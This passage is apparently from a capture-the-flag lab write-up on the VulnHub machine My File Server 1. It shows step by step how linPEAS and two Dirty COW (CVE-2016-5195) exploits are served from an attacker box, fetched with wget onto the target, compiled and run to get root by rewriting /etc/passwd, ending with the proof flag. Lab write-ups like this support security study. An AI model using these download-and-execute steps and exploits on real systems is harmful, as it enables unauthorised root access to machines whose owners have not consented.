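    return v < 0 or (v == 0 and _cmp(pa[1], pb[1]) < 0)

def dirty_cow_candidate(release):
    """True if the running el7 kernel predates the Dirty COW fix."""
    return older_than(release, FIXED_EL7)

if __name__ == "__main__":
    import subprocess
    r = subprocess.run(["uname", "-r"], capture_output=True, text=True).stdout.strip()
    print(r, "-> Dirty COW candidate:", dirty_cow_candidate(r))
```

On this box `uname -r` gives 3.10.0-229.el7.x86_64, which sorts well before 327.36.3, so the two Dirty COW entries linPEAS lists are plausible before anything is compiled on the target. The same skeleton works for any other el7 advisory by changing the reference string.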

Kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:16] 
$ ls linPEAS.sh 
linPEAS.sh

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:26] 
$ php -S 0:80
[Sun Jun 11 15:56:28 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Accepted
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 [200]: (null) /linPEAS.sh
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Closing

Target

smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ ls
systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ wget http://192.168.54.128/linPEAS.sh
--2023-06-11 21:00:34--  http://192.168.54.128/linPEAS.sh
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [application/x-sh]
Saving to: 'linPEAS.sh'

100%[===============================================================================================================>] 828,172     --.-K/s   in 0.03s   

2023-06-11 21:00:34 (30.8 MB/s) - 'linPEAS.sh' saved [828172/828172]

[smbuser@fileserver tmp]$ chmod +x linPEAS.sh 
[smbuser@fileserver tmp]$ ./linPEAS.sh 

From the output, the useful kernel-exploit hints are these:
[screenshot: the kernel exploit suggestions from the linPEAS output]
Try these two first: pull them onto Kali with searchsploit, then serve them over HTTP.
Kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:18] C:130
$ searchsploit -m 40611 40847           
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
      URL: https://www.exploit-db.com/exploits/40611
     Path: /usr/share/exploitdb/exploits/linux/local/40611.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40611.c


  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40847.cpp



# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:35] 
$ php -S 0:80
[Sun Jun 11 16:00:51 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Accepted
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 [200]: (null) /40611.c
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Closing
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Accepted
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 [200]: (null) /40847.cpp
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Closing

40611

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40611.c
--2023-06-11 21:05:01--  http://192.168.54.128/40611.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2821 (2.8K) [text/x-c]
Saving to: '40611.c'

100%[===============================================================================================================>] 2,821       --.-K/s   in 0s      

2023-06-11 21:05:01 (666 MB/s) - '40611.c' saved [2821/2821]


[smbuser@fileserver tmp]$ ls
40611.c  40847.cpp  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ head 40611.c 
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w


[smbuser@fileserver tmp]$ gcc -pthread 40611.c -o 40611
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content

The usage line shows that dirtyc0w takes a target file and new content: it overwrites a file the current user can read but not write, it does not read files. The first attempt misread it as a reader and pointed it at /etc/shadow, hoping for a copy in /tmp/shadow; what the command below actually asks for is to write the string "/tmp/shadow" into /etc/shadow.

[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content
[smbuser@fileserver tmp]$ ./40611 /etc/shadow /tmp/shadow
mmap ffffffffffffffff

 
ls
^C
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT

Nothing came back, only a hang until ^C. /etc/shadow is mode 000 on CentOS, so smbuser cannot open it, the mmap fails (ffffffffffffffff is MAP_FAILED printed as hex) and the race threads spin against nothing. Had the file been readable, the run would have clobbered its contents with the literal string, so this misuse is dangerous rather than harmless. Move on to 40847.

40847

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40847.cpp
--2023-06-11 21:05:10--  http://192.168.54.128/40847.cpp
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10212 (10.0K) [text/x-c]
Saving to: '40847.cpp'

100%[===============================================================================================================>] 10,212      --.-K/s   in 0s      

2023-06-11 21:05:10 (410 MB/s) - '40847.cpp' saved [10212/10212]


[smbuser@fileserver tmp]$ head 40847.cpp 
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016  Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.


[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
40611  40611.c  40847.cpp  dcow  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./dcow
Running ...
Received su prompt (Password:)
Root password is:   dirtyCowFun
Enjoy! :-)

The exploit worked: root's password is now dirtyCowFun, so switch to root. dcow gets there by rewriting root's entry in /etc/passwd with a hash of that password; on anything other than a throwaway VM, restore the original /etc/passwd afterwards (the tool's -h output describes which modes do that for you).

[smbuser@fileserver tmp]$ su
Password:
[root@fileserver tmp]# whoami
root

Flag

[root@fileserver tmp]# whoami
root

[root@fileserver tmp]# uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

[root@fileserver tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1440sec preferred_lft 1440sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever

[root@fileserver tmp]# ls /root
proof.txt
[root@fileserver tmp]# cat proof.txt
cat: proof.txt: No such file or directory
[root@fileserver tmp]# cat /root/proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43

Source: http://www.coloradmin.cn/o/634088.html